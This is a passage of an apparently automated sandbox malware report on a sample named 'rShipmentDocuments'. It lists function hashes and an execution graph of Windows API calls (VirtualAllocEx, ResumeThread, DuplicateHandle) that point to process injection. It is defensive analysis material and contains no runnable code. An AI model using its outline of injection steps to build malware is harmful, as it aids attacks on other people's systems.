                                                      • Opcode Fuzzy Hash: b61210bb7f475a81d65d5d33698b2971050e92cedc0608b636f493d54f1ff936
                                                      • Instruction Fuzzy Hash: E0F09C317406204B8B175B6E949462A76DEEFC9955355407AF546CB362DF21CC038790
                                                      Function 02A3E8E8 Relevance: .0, Instructions: 42COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2bddbfa85210abda3671f7689382c4cf4069701b428174991c806393efc93433
                                                      • Instruction ID: 41669db5a806c4ea515d66e05941b0fe3eda438567ee843d318ee467f87fccb1
                                                      • Opcode Fuzzy Hash: 2bddbfa85210abda3671f7689382c4cf4069701b428174991c806393efc93433
                                                      • Instruction Fuzzy Hash: 5A016574D0020AEFCF40DFA8E884AEEBBB1FB49304F008425E810A3304D7345A12DF91
                                                      Function 02A328A2 Relevance: .0, Instructions: 20COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fcbd58049a624606989b252e4ca47b269f783056910103daa2baa8effb29f823
                                                      • Instruction ID: d4d6e1ea5e8cad2d2654dcacad89cbcf75117f355b2331b1a19eb975ba1e1102
                                                      • Opcode Fuzzy Hash: fcbd58049a624606989b252e4ca47b269f783056910103daa2baa8effb29f823
                                                      • Instruction Fuzzy Hash: 8CE08676E5032A87CB01EBB0DD040EEB735AFD1221F59451BC4A532180EB30665A8792
                                                      Function 02A328B0 Relevance: .0, Instructions: 19COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f29641ee47913da3220ebff5a7961da3f13df7957e61362b255a518f03c18855
                                                      • Instruction ID: 38500f3bade9f6392afe9a83f925e0f025d31839c3fe1b8d4446b912d8b1d3f2
                                                      • Opcode Fuzzy Hash: f29641ee47913da3220ebff5a7961da3f13df7957e61362b255a518f03c18855
                                                      • Instruction Fuzzy Hash: 72D01231D2022A578B00AAA5DC044EEB738EE95665B504626D55437140EB70665986A2
                                                      Function 02A3D6D4 Relevance: .0, Instructions: 16COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8a351aa77bde1997cfc5ab900d77af0364a89b611f1cad614f1547aa79b9a73d
                                                      • Instruction ID: 96a20c8d04e8c027be868557d2f3043eb2b6d51c958c78dbea7818f36243f399
                                                      • Opcode Fuzzy Hash: 8a351aa77bde1997cfc5ab900d77af0364a89b611f1cad614f1547aa79b9a73d
                                                      • Instruction Fuzzy Hash: 73D0E234E44008CBCF20DFB8E4844DCBB74EB88321B10542AE825A7210D6305460CF00
                                                      Function 02A36739 Relevance: .0, Instructions: 16COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4baebb448c867e67a9175068b5a84763477548b33382754b2535e9b1d2ff6263
                                                      • Instruction ID: d41ea84c4c58f40cd4947e0c418a48b588aa251b39cb90ff629a9a27bc79a5e0
                                                      • Opcode Fuzzy Hash: 4baebb448c867e67a9175068b5a84763477548b33382754b2535e9b1d2ff6263
                                                      • Instruction Fuzzy Hash: 35D02E3345030A8ECB00F720EC42B047B6AB780208F009520E0154B21EEF78A8648B40
                                                      Function 02A3AFAD Relevance: .0, Instructions: 16COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: eee6703129eb76f5471c1ac5fa716d3ec6400d9db94f8b8d92040ca2d893bf3d
                                                      • Instruction ID: a7af40af0fa7439ff073fdc04d660932f67dff72ca53cad15f0b1c34cacc13a7
                                                      • Opcode Fuzzy Hash: eee6703129eb76f5471c1ac5fa716d3ec6400d9db94f8b8d92040ca2d893bf3d
                                                      • Instruction Fuzzy Hash: BED0673AB40018DFCF049F99E840CDDF7B6FB98261B148516E915A7261CA319925DB54
                                                      Function 02A36748 Relevance: .0, Instructions: 12COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ee1e29dd38130649b40bb1bb444613d3d646e066bdd2c66854e2ac972e7feda1
                                                      • Instruction ID: 4e8a94c366f1937df7520f3d0447f3a901e49e53cbd1a26111d4845ec03c6213
                                                      • Opcode Fuzzy Hash: ee1e29dd38130649b40bb1bb444613d3d646e066bdd2c66854e2ac972e7feda1
                                                      • Instruction Fuzzy Hash: E8C080314443194FC905F775FD45659772FF6C02047509530D4094B75DEF745CA95790

                                                      Non-executed Functions

                                                      Function 068F0040 Relevance: 1.8, Strings: 1, Instructions: 596COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4155123537.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_68f0000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .5vq
                                                      • API String ID: 0-493797296
                                                      • Opcode ID: 1d3c3d120ec100b4d9d3391f017eef0745ede84a9a5b9e61b9881d6b56294ba3
                                                      • Instruction ID: 226a77457163b0ae80ee712499b3ae72acbaac92c45621dad9f1c8b4a6f49bd5
                                                      • Opcode Fuzzy Hash: 1d3c3d120ec100b4d9d3391f017eef0745ede84a9a5b9e61b9881d6b56294ba3
                                                      • Instruction Fuzzy Hash: F152B974E01228CFDB64DF69C984B9DBBB2BF89300F1085EAD509AB255DB359E81CF50
                                                      Function 02A3F961 Relevance: .3, Instructions: 273COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6823cd61ba80a7694dc2c36ca800466dfa1c2155e63e061f9e7bfb8b755c0698
                                                      • Instruction ID: 7727b268b3119a239caf8a23da021cd301b6925a7d84b2998102d9f9246c617f
                                                      • Opcode Fuzzy Hash: 6823cd61ba80a7694dc2c36ca800466dfa1c2155e63e061f9e7bfb8b755c0698
                                                      • Instruction Fuzzy Hash: FEC1C274E11218CFDB54DFA9C994B9DBBB2BF89304F2080A9D809AB364DB355E85CF50
                                                      Function 068FE6B0 Relevance: .3, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4155123537.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_68f0000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 98d58ae152601d34960fac82b9b9f392eb1f156924b85aff3f8fd83f5b1f7c35
                                                      • Instruction ID: 4377c2247123c7e983c1c80e5e0825bd62d4deec0c7ab2d7f05eec7d08903869
                                                      • Opcode Fuzzy Hash: 98d58ae152601d34960fac82b9b9f392eb1f156924b85aff3f8fd83f5b1f7c35
                                                      • Instruction Fuzzy Hash: CDC1B274E10218CFDB54DFA9C954BADBBB2BF89304F1080A9D909AB364DB359E85CF50
                                                      Function 068FDE00 Relevance: .3, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4155123537.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_68f0000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 68a47eaa187e273f377ed3dd9e357205607b09d7f8ffe8b52e0ccecd5fc24f43
                                                      • Instruction ID: 31f2aca570c4be760bb182fa0c08756ab2c9db074f398155e9abfc827d274560
                                                      • Opcode Fuzzy Hash: 68a47eaa187e273f377ed3dd9e357205607b09d7f8ffe8b52e0ccecd5fc24f43
                                                      • Instruction Fuzzy Hash: 4EC1B274E10218CFDB54DFA9C954B9DBBB2BF89304F1080A9D909AB364DB359E85CF50
                                                      Function 068FE258 Relevance: .3, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4155123537.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_68f0000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 42cd6b59af62bed5ce76e4b827632307e2111dd4407da0a6e8f2b145025e1933
                                                      • Instruction ID: da5adae2d0e01d7e1df155ee74ab29d7b869df7c3b726b5f21481e34b6945490
                                                      • Opcode Fuzzy Hash: 42cd6b59af62bed5ce76e4b827632307e2111dd4407da0a6e8f2b145025e1933
                                                      • Instruction Fuzzy Hash: 26C1B274E10218CFDB54DFA9C954B9DBBB2BF89304F2080A9D909AB364DB359E85CF50
                                                      Function 068FEB08 Relevance: .3, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4155123537.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_68f0000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9a9e440ea38dcdcab200b03b979f3aae1fc537c05d602ba37aaa75ec4efd93f8
                                                      • Instruction ID: 7e19a2d7ab1806546f36629fe0c1fc350b52d34d29ed1983d17c3ec6c40932c2
                                                      • Opcode Fuzzy Hash: 9a9e440ea38dcdcab200b03b979f3aae1fc537c05d602ba37aaa75ec4efd93f8
                                                      • Instruction Fuzzy Hash: 06C1C174E10218CFDB54DFA9C944BADBBB2BF89304F1080A9D909AB364DB359E85CF50
                                                      Function 068FEF60 Relevance: .3, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4155123537.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_68f0000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b4100449e3bc42f7ed3b71f3210aa5dcb327ed570c97708c38d0c5029069fb33
                                                      • Instruction ID: bf38a5b8d3aa8ad269069275e8d8db85487a53cce48bec38f8f81770577ba709
                                                      • Opcode Fuzzy Hash: b4100449e3bc42f7ed3b71f3210aa5dcb327ed570c97708c38d0c5029069fb33
                                                      • Instruction Fuzzy Hash: 8FC1C174E10218CFDB54DFA9C954BADBBB2BF89300F2080A9D909AB354DB359E85CF51
                                                      Function 068FCCA0 Relevance: .3, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4155123537.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_68f0000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8a347cc799c1e1d1137db10784560cac175c196c9b421cc62aa1d24fa6eb206f
                                                      • Instruction ID: 2dd403afe161a74ee002bd6146f913b8abe7c9f70e03eec2e7d9e2893999c63c
                                                      • Opcode Fuzzy Hash: 8a347cc799c1e1d1137db10784560cac175c196c9b421cc62aa1d24fa6eb206f
                                                      • Instruction Fuzzy Hash: F9C1B174E10218CFDB54DFA9C954BADBBB2BF89300F2080A9D909AB354DB359E85CF50
                                                      Function 068FD0F8 Relevance: .3, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4155123537.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_68f0000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d015a7bfe1e40953ed37d44955a9dab8f86187b7da75e5bec0b1d2167733cd9d
                                                      • Instruction ID: 1b2dc6ac718517687824f54f76648bd28d62dd5e27341ae6b5c456b9afdc0d9d
                                                      • Opcode Fuzzy Hash: d015a7bfe1e40953ed37d44955a9dab8f86187b7da75e5bec0b1d2167733cd9d
                                                      • Instruction Fuzzy Hash: 60C1B274E10218CFDB54DFA9C954BADBBB2BF89304F1080A9D909AB354DB359E85CF50
                                                      Function 068FF810 Relevance: .3, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4155123537.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_68f0000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 71cba48efc9125134d462b318e02793cb77d00e712dd69f259d97190fd1f724c
                                                      • Instruction ID: e520828b37f997b2e8a478783738353c8de5d5b866782ab1d68b0ebbddbb25e8
                                                      • Opcode Fuzzy Hash: 71cba48efc9125134d462b318e02793cb77d00e712dd69f259d97190fd1f724c
                                                      • Instruction Fuzzy Hash: 17C1B274E10218CFDB54DFA9C954BADBBB2BF89304F2080A9D909AB354DB359E85CF50
                                                      Function 068FD9A8 Relevance: .3, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4155123537.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_68f0000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ce30a3e09a90ce5f847d3a7bb387dacf3174fd171adf43f651114fb265c5160d
                                                      • Instruction ID: 40af5d5de2129d90dd536c4ec3228bdb01a2d12f962076b7e25168e3472699c4
                                                      • Opcode Fuzzy Hash: ce30a3e09a90ce5f847d3a7bb387dacf3174fd171adf43f651114fb265c5160d
                                                      • Instruction Fuzzy Hash: 92C1B174E10218CFDB54DFA9C954BADBBB2BF89304F2080A9D909AB354DB359E85CF50
                                                      Function 068FD550 Relevance: .3, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4155123537.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_68f0000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 46f1461be5b6cce020881cab0441e51e82fbd3e099cd6e2dfd4c0ed4a0ae018e
                                                      • Instruction ID: 9ffa58ee6d054a8404a9059dec5db467d5a9e05f345c408f89dc72da99e18b61
                                                      • Opcode Fuzzy Hash: 46f1461be5b6cce020881cab0441e51e82fbd3e099cd6e2dfd4c0ed4a0ae018e
                                                      • Instruction Fuzzy Hash: 7DC1C174E10218CFDB54DFA9C994B9DBBB2BF89300F2080A9D909AB354DB359E85CF50
                                                      Function 068F0673 Relevance: .2, Instructions: 193COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4155123537.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_68f0000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c090a2ad55365e3be8d634a0c6979e094a9eb00423dc1f47acb9b3298078913c
                                                      • Instruction ID: 23262aebe387071f5ecfa71c34a0f37402f07aba564017a1c191084233b93a07
                                                      • Opcode Fuzzy Hash: c090a2ad55365e3be8d634a0c6979e094a9eb00423dc1f47acb9b3298078913c
                                                      • Instruction Fuzzy Hash: D2A19974A01228CFDB65DF24C994B9EBBB2BF4A304F1084EAD50EA7254DB319E81CF51
                                                      Function 02A3F2C0 Relevance: .1, Instructions: 148COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b63e34a67dbfaa59b250a75fde21190e7deb3670f02dd2b3ef266e5776996434
                                                      • Instruction ID: 869afdc028828715cdb141b7b4ff1e12492826e15e371a6df9edbd8f5a33870e
                                                      • Opcode Fuzzy Hash: b63e34a67dbfaa59b250a75fde21190e7deb3670f02dd2b3ef266e5776996434
                                                      • Instruction Fuzzy Hash: 4F516470D14208CFDB06EFA9D9847ADFBB2BF89304F20D129E404AB698DB759881CF54
                                                      Function 02A3F4AC Relevance: .1, Instructions: 146COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a5b73eba95ea3ce871c8b9eade475f7cf7f16759633e36571d4800e056d06ecd
                                                      • Instruction ID: 6ec92d4b5d0df5612788444ae881a520533cb8a90a75793bd12435f857077c6f
                                                      • Opcode Fuzzy Hash: a5b73eba95ea3ce871c8b9eade475f7cf7f16759633e36571d4800e056d06ecd
                                                      • Instruction Fuzzy Hash: 07512370D15208CFCB12EFA8D5847EDBBB2BF49314F209129E419AB694DB759881CF54
                                                      Function 068F0853 Relevance: .1, Instructions: 116COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4155123537.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_68f0000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c291e2614c11bdd0d606322ff5eedf1815abcf9bac9b00956c45acee6420b615
                                                      • Instruction ID: 468b1cf0996731d8330747a78f515ebef9d43b1e917d8416296c1596ff5c3ec9
                                                      • Opcode Fuzzy Hash: c291e2614c11bdd0d606322ff5eedf1815abcf9bac9b00956c45acee6420b615
                                                      • Instruction Fuzzy Hash: 4551BF34A01228CFCB65DF24C854BADB7B2BF4A305F5089E9D50AA7354CB369E81CF50
                                                      Function 02A32A69 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Xbq$Xbq$Xbq$Xbq
                                                      • API String ID: 0-2732225958
                                                      • Opcode ID: 905cd99ae9629ca95898282c506743fe21038c1b75a4d8ea3104a90090156240
                                                      • Instruction ID: 766351782aa550778ae5bd0c3bf578815315cac7b3c05f7b6ad570b91c2c493c
                                                      • Opcode Fuzzy Hash: 905cd99ae9629ca95898282c506743fe21038c1b75a4d8ea3104a90090156240
                                                      • Instruction Fuzzy Hash: 04314171E042198BDFA6DF7989C13AFB6B6AB88300F1444B5E915A7394DF30CD85CB92
                                                      Function 02A36920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: \;^q$\;^q$\;^q$\;^q
                                                      • API String ID: 0-3001612457
                                                      • Opcode ID: 628416a1f66d5079f6a16a36008809c527d19e6454143a35c04b12206382ff8b
                                                      • Instruction ID: a92f7a454c3bef82539ecb18423cfa9f3fa7c796e61f66c92a8eceff8d0db703
                                                      • Opcode Fuzzy Hash: 628416a1f66d5079f6a16a36008809c527d19e6454143a35c04b12206382ff8b
                                                      • Instruction Fuzzy Hash: 04019A31B40104AF8B6A8F2CC584A2537EEAB88F60725446AF446CF3B4DE21DC418788

                                                      Execution Graph

                                                      Execution Coverage:10.6%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:266
                                                      Total number of Limit Nodes:17
                                                      execution_graph 36334 94d700 36335 94d702 DuplicateHandle 36334->36335 36336 94d796 36335->36336 36361 9446a0 36362 9446b7 36361->36362 36363 94478f 36362->36363 36365 9447b8 36362->36365 36366 9447da 36365->36366 36367 9447e5 36366->36367 36369 9448b0 36366->36369 36367->36362 36370 9448b5 36369->36370 36374 9449b0 36370->36374 36378 9449c0 36370->36378 36375 9449c0 36374->36375 36376 944ac4 36375->36376 36382 944610 36375->36382 36376->36376 36380 9449e7 36378->36380 36379 944ac4 36379->36379 36380->36379 36381 944610 CreateActCtxA 36380->36381 36381->36379 36383 945e50 CreateActCtxA 36382->36383 36385 945f13 36383->36385 36404 69cac68 36405 69cadf3 36404->36405 36406 69cac8e 36404->36406 36406->36405 36408 69c8718 36406->36408 36409 69caee8 PostMessageW 36408->36409 36410 69caf54 36409->36410 36410->36406 36337 94d4b8 36338 94d4fe GetCurrentProcess 36337->36338 36340 94d550 GetCurrentThread 36338->36340 36341 94d549 36338->36341 36342 94d586 36340->36342 36343 94d58d GetCurrentProcess 36340->36343 36341->36340 36342->36343 36346 94d5c3 36343->36346 36344 94d5eb GetCurrentThreadId 36345 94d61c 36344->36345 36346->36344 36347 94b138 36351 94b230 36347->36351 36356 94b21f 36347->36356 36348 94b147 36352 94b264 36351->36352 36353 94b241 36351->36353 36352->36348 36353->36352 36354 94b468 GetModuleHandleW 36353->36354 36355 94b495 36354->36355 36355->36348 36357 94b264 36356->36357 36358 94b241 36356->36358 36357->36348 36358->36357 36359 94b468 GetModuleHandleW 36358->36359 36360 94b495 36359->36360 36360->36348 36085 69c7d12 36086 69c7d18 36085->36086 36092 69c9a97 36086->36092 36112 69c99f2 36086->36112 36131 69c9a50 36086->36131 36150 69c9a00 36086->36150 36087 69c7d23 36093 69c9a35 36092->36093 36094 69c9a9b 36092->36094 36105 69c9a22 36093->36105 36169 69c9f5d 36093->36169 36182 69ca29c 36093->36182 36190 69ca1a3 36093->36190 36195 69ca462 36093->36195 36205 69ca2e0 36093->36205 36209 69ca306 36093->36209 36214 69c9ee5 36093->36214 36218 69ca685 36093->36218 36223 69ca04d 36093->36223 36227 69ca331 36093->36227 36235 69ca017 36093->36235 36241 69c9e35 36093->36241 36245 69c9ffb 36093->36245 36250 69c9f7a 36093->36250 36255 69ca4d8 36093->36255 36272 69ca27e 36093->36272 36094->36087 36105->36087 36113 69c99f9 36112->36113 36114 69c9995 36113->36114 36115 69ca29c 4 API calls 36113->36115 36116 69c9f5d 4 API calls 36113->36116 36117 69ca27e 4 API calls 36113->36117 36118 69ca4d8 6 API calls 36113->36118 36119 69c9f7a 2 API calls 36113->36119 36120 69c9ffb 2 API calls 36113->36120 36121 69c9e35 2 API calls 36113->36121 36122 69ca017 2 API calls 36113->36122 36123 69ca331 4 API calls 36113->36123 36124 69ca04d 2 API calls 36113->36124 36125 69ca685 2 API calls 36113->36125 36126 69c9ee5 2 API calls 36113->36126 36127 69ca306 2 API calls 36113->36127 36128 69ca2e0 2 API calls 36113->36128 36129 69ca462 4 API calls 36113->36129 36130 69ca1a3 2 API calls 36113->36130 36114->36087 36115->36114 36116->36114 36117->36114 36118->36114 36119->36114 36120->36114 36121->36114 36122->36114 36123->36114 36124->36114 36125->36114 36126->36114 36127->36114 36128->36114 36129->36114 36130->36114 36133 69c99f5 36131->36133 36132 69c9a22 36132->36087 36133->36131 36133->36132 36134 69ca29c 4 API calls 36133->36134 36135 69c9f5d 4 API calls 36133->36135 36136 69ca27e 4 API calls 36133->36136 36137 69ca4d8 6 API calls 36133->36137 36138 69c9f7a 2 API calls 36133->36138 36139 69c9ffb 2 API calls 36133->36139 36140 69c9e35 2 API calls 36133->36140 36141 69ca017 2 API calls 36133->36141 36142 69ca331 4 API calls 36133->36142 36143 69ca04d 2 API calls 36133->36143 36144 69ca685 2 API calls 36133->36144 36145 69c9ee5 2 API calls 36133->36145 36146 69ca306 2 API calls 36133->36146 36147 69ca2e0 2 API calls 36133->36147 36148 69ca462 4 API calls 36133->36148 36149 69ca1a3 2 API calls 36133->36149 36134->36132 36135->36132 36136->36132 36137->36132 36138->36132 36139->36132 36140->36132 36141->36132 36142->36132 36143->36132 36144->36132 36145->36132 36146->36132 36147->36132 36148->36132 36149->36132 36151 69c9a1a 36150->36151 36152 69ca29c 4 API calls 36151->36152 36153 69c9f5d 4 API calls 36151->36153 36154 69ca27e 4 API calls 36151->36154 36155 69ca4d8 6 API calls 36151->36155 36156 69c9f7a 2 API calls 36151->36156 36157 69c9ffb 2 API calls 36151->36157 36158 69c9e35 2 API calls 36151->36158 36159 69ca017 2 API calls 36151->36159 36160 69ca331 4 API calls 36151->36160 36161 69ca04d 2 API calls 36151->36161 36162 69c9a22 36151->36162 36163 69ca685 2 API calls 36151->36163 36164 69c9ee5 2 API calls 36151->36164 36165 69ca306 2 API calls 36151->36165 36166 69ca2e0 2 API calls 36151->36166 36167 69ca462 4 API calls 36151->36167 36168 69ca1a3 2 API calls 36151->36168 36152->36162 36153->36162 36154->36162 36155->36162 36156->36162 36157->36162 36158->36162 36159->36162 36160->36162 36161->36162 36162->36087 36163->36162 36164->36162 36165->36162 36166->36162 36167->36162 36168->36162 36170 69c9f74 36169->36170 36174 69c7379 ResumeThread 36170->36174 36289 69c7380 36170->36289 36171 69ca40d 36172 69ca46d 36171->36172 36181 69c7380 ResumeThread 36171->36181 36285 69c7379 36171->36285 36173 69ca3ea 36172->36173 36178 69c7508 VirtualAllocEx 36172->36178 36179 69c7501 VirtualAllocEx 36172->36179 36293 69c7501 36173->36293 36297 69c7508 36173->36297 36174->36171 36178->36173 36179->36173 36181->36171 36183 69ca340 36182->36183 36301 69c76b8 36183->36301 36305 69c76b0 36183->36305 36184 69ca744 36185 69c9f03 36185->36184 36186 69c7508 VirtualAllocEx 36185->36186 36187 69c7501 